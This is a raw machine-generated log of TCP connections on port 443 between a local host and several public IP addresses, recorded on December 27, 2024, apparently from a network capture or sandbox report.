Dec 27, 2024 07:10:12.915390968 CET	443	49846	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:12.915416956 CET	49846	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:12.915465117 CET	49846	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:12.916534901 CET	49846	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:12.916553020 CET	443	49846	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:37.616797924 CET	49927	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:37.616852045 CET	443	49927	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:37.618103981 CET	49927	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:37.618345022 CET	49927	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:37.618361950 CET	443	49927	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:37.954493999 CET	49703	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:10:38.004270077 CET	49934	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.004307985 CET	443	49934	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.004365921 CET	49934	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.004878998 CET	49935	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.004925966 CET	443	49935	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.004981041 CET	49935	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.005636930 CET	49935	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.005650043 CET	443	49935	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.005803108 CET	49934	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.005817890 CET	443	49934	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.055705070 CET	49936	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.055757046 CET	443	49936	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:38.055819035 CET	49936	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.056726933 CET	49936	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.056746006 CET	443	49936	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:38.345056057 CET	49703	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:10:38.616945028 CET	49935	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.617410898 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.617463112 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.617527962 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.617783070 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.617795944 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.619004011 CET	49934	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.619086027 CET	49927	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:38.619836092 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:38.619848967 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:38.619930029 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:38.620285988 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.620294094 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.620357990 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.621613026 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.621625900 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.621630907 CET	49936	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.621891022 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.621898890 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:38.621984959 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.621984959 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:38.622006893 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:38.622600079 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.622612953 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:38.659332037 CET	443	49935	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.659367085 CET	443	49927	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:38.663347960 CET	443	49934	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.667329073 CET	443	49936	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:38.754070997 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.754101038 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:38.754430056 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.754940987 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:38.754956007 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:38.767988920 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.768009901 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.768100023 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.768300056 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.768307924 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.831291914 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.831326008 CET	443	49953	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.832128048 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.832509041 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:38.832525015 CET	443	49953	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:38.868295908 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:38.868318081 CET	443	49956	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:38.868371964 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:38.868844986 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:38.868854046 CET	443	49956	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:39.046576023 CET	49703	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:10:39.051620007 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:39.051645994 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:39.051794052 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:39.052012920 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:39.052023888 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:39.218266010 CET	443	49935	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.218363047 CET	443	49935	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.218384027 CET	49935	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.218420982 CET	49935	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.220086098 CET	443	49934	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.220257998 CET	443	49934	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.220319033 CET	49934	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.222466946 CET	49934	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.361598015 CET	443	49936	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:39.361757994 CET	49936	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:39.560151100 CET	443	49927	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:39.560223103 CET	49927	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:39.827519894 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.827831030 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.827842951 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.828819036 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.828888893 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.830120087 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.830183029 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.830241919 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.871337891 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.889566898 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.889929056 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.889946938 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.891383886 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.891405106 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:39.891458035 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.892663956 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.892735004 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.892852068 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:39.892860889 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:39.893152952 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.893162012 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.893877029 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:39.893954992 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:39.895000935 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:39.895059109 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:39.895117998 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:39.895126104 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:39.941278934 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:39.941278934 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:39.941287994 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:39.954401970 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:39.954443932 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:39.954510927 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:39.954818010 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:39.954839945 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:40.004787922 CET	49973	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.004890919 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.004981995 CET	49973	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.005198002 CET	49973	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.005233049 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.024072886 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.024391890 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.024409056 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.025547028 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.025609970 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.025957108 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.026052952 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.026088953 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.056879044 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.057070971 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.057082891 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.058506966 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.058608055 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.058883905 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.058964968 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.058990955 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.067337036 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.069447041 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.099339962 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.102758884 CET	443	49953	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.103034019 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.103050947 CET	443	49953	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.104024887 CET	443	49953	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.104099035 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.104401112 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.104455948 CET	443	49953	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.104513884 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.104520082 CET	443	49953	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.144992113 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.144994974 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.144994974 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.145000935 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.145020008 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.160964966 CET	49974	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.160996914 CET	443	49974	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.161082029 CET	49974	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.161398888 CET	49974	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.161412001 CET	443	49974	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.175699949 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.260832071 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.260895014 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.261061907 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.261173010 CET	49944	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.261187077 CET	443	49944	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.279444933 CET	443	49956	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:40.279516935 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:40.279952049 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:40.279958963 CET	443	49956	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:40.282300949 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:40.282306910 CET	443	49956	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:40.282342911 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:40.282350063 CET	443	49956	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:40.285725117 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.285792112 CET	443	49953	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.285857916 CET	49953	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.332653046 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.332716942 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.332789898 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.332988024 CET	49941	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.332999945 CET	443	49941	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.334708929 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.334768057 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.334853888 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.334990025 CET	49949	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.335000992 CET	443	49949	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.339598894 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.339601040 CET	49703	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:10:40.339634895 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.468018055 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.468099117 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.468151093 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.468307018 CET	49952	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.468322039 CET	443	49952	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.509223938 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.509299994 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.509545088 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.509633064 CET	49951	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:40.509643078 CET	443	49951	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:40.621191025 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:40.621377945 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:40.621386051 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:40.621747971 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:40.621762037 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:40.621845007 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:40.621853113 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:40.621948004 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:40.622446060 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:40.623596907 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:40.623665094 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:40.623903990 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:40.623919964 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:40.672575951 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:40.782520056 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.782547951 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.782640934 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.782699108 CET	49979	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.782722950 CET	443	49979	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.782785892 CET	49979	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.782877922 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.782891989 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.782990932 CET	49979	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.783004045 CET	443	49979	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:40.867182016 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:40.867389917 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:40.867400885 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:40.868513107 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:40.868576050 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:40.869607925 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:40.869668007 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:40.921025038 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:40.921034098 CET	443	49966	18.165.220.106	192.168.2.5
Dec 27, 2024 07:10:40.967068911 CET	49966	443	192.168.2.5	18.165.220.106
Dec 27, 2024 07:10:41.260962963 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:41.261209011 CET	49973	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:41.261221886 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:41.261677027 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:41.261970043 CET	49973	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:41.262044907 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:41.262116909 CET	49973	443	192.168.2.5	162.159.61.3
Dec 27, 2024 07:10:41.303332090 CET	443	49973	162.159.61.3	192.168.2.5
Dec 27, 2024 07:10:41.314146042 CET	443	49956	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.314205885 CET	443	49956	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.314209938 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.314300060 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.315093040 CET	49956	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.315107107 CET	443	49956	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.327066898 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.331072092 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.331154108 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.331162930 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.342736006 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.343147993 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.343153954 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.352345943 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.352411985 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.352420092 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.365915060 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.366060019 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.366067886 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.366908073 CET	49980	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.366957903 CET	443	49980	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.367104053 CET	49980	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.367196083 CET	49981	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.367224932 CET	443	49981	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.367289066 CET	49981	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.367598057 CET	49980	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.367614031 CET	443	49980	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.367752075 CET	49981	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.367759943 CET	443	49981	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.381012917 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.381185055 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.381191969 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.397742033 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.397836924 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.397844076 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.404201031 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.404279947 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.404704094 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.404709101 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.406656027 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.406661987 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.406733990 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.406750917 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.406755924 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.406761885 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.406805038 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.406811953 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.406936884 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.406955004 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.406965017 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.406975031 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.406980991 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.406991959 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407006025 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407012939 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407114029 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407126904 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407152891 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407161951 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407324076 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407332897 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407406092 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407418013 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407495975 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407509089 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407519102 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407525063 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407541037 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407551050 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407603979 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407617092 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407634020 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407644033 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407699108 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407712936 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.407722950 CET	49972	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:41.407732964 CET	443	49972	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:41.440773010 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.446624041 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.450805902 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.451333046 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.451340914 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.503485918 CET	49943	443	192.168.2.5	142.250.181.65
Dec 27, 2024 07:10:41.503492117 CET	443	49943	142.250.181.65	192.168.2.5
Dec 27, 2024 07:10:41.521914005 CET	443	49974	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.522140980 CET	49974	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.522155046 CET	443	49974	172.64.41.3	192.168.2.5
